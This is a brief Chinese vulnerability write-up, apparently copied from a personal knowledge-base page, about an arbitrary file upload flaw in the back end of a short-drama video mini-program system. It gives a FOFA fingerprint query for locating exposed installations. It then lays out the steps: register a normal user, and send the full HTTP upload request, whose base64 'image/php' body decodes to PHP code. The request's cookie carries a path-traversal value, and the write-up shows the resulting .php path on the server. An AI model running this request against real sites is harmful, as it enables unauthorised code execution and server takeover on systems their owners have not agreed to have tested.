登录 白背景
源码

小剧场短剧影视系统存在后台任意文件上传漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);"> 2024年最新新版小剧场短剧影视小程序源码+风口项目 ,短剧APP 小程序源码 风口项目 ,小剧场短剧影视系统存在后台任意文件上传漏洞。</font>

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

  • 小剧场短剧影视系统

三、资产测绘

  • fofa"/VwmRIfEYDH.php"
  • 特征

1725184858662-ad360b7b-60cf-466b-be25-53103b85a699.png

四、漏洞复现

  1. 访问/index/user注册普通用户账号

1725185234318-dccb706e-3d73-4906-ae74-edb5ea9920db.png

  1. 使用上一步获取到的cookie上传文件
POST /api/user/avatar HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: PHPSESSID=r18d8v4q3qenstjmj0c3p5vof9; think_var=..%2F..%2Fapplication%2Fdatabase; uid=1553; token=63bacb4b-81b3-40e5-aa7e-717fa4edff29
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

base64=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==

1725185266307-a548bda3-a811-4c31-8464-47321a3a5934.png

/uploads/20240901/2cf6820cd17bb8b6c0dd3107def6855b.php

1725185298796-ba2f3da4-0f12-429f-bbd9-7ce5ae698f04.png

原文: https://www.yuque.com/xiaokp7/ocvun2/pef5oylgawsii1an